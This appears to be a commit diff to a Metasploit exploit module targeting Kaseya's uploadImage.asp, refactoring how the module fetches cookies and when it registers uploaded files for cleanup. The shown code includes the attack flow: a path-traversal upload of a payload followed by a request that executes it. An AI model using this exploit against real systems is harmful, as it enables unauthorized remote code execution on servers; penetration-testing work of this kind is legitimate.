Use res.get_cookies instead of homebrew parse. Use _cgi

modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb

@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'method' => 'POST',
       'uri'    => normalize_uri('SystemTab','uploadImage.asp')
     })
-    
+
     # the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
 
     if not res or res.code != 500
@@ -53,21 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
     return Exploit::CheckCode::Appears
   end
 
-  def get_cookie
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri'    => normalize_uri("SystemTab", "uploadImage.asp")
-    })
-
-    if res and res.headers['Set-Cookie']
-      cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
-    else
-      fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
-    end
-
-    cookie
-  end
-
   def exploit
     peer = "#{rhost}:#{rport}"
 
@@ -80,8 +65,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
     data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
-    cookie = get_cookie
-    res = send_request_raw({
+    res = send_request_cgi({
+       'method' => 'GET',
+       'uri'    => normalize_uri("SystemTab", "uploadImage.asp")
+    })
+
+    cookie = res.get_cookies
+
+    res = send_request_cgi({
       "method" => "POST",
       "uri"    => normalize_uri("SystemTab","uploadImage.asp?filename=..\\..\\..\\..\\#{@payload_name}"),
       "data"   => data,
@@ -89,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote
       "cookie" => cookie
     })
 
-    register_files_for_cleanup(@payload_name)
-
     if not res or res.code != 200
       fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
+    register_files_for_cleanup(@payload_name)
+
     print_status("#{peer} - Executing payload #{@payload_name}")
     res = send_request_cgi({
       'uri'    => normalize_uri(@payload_name),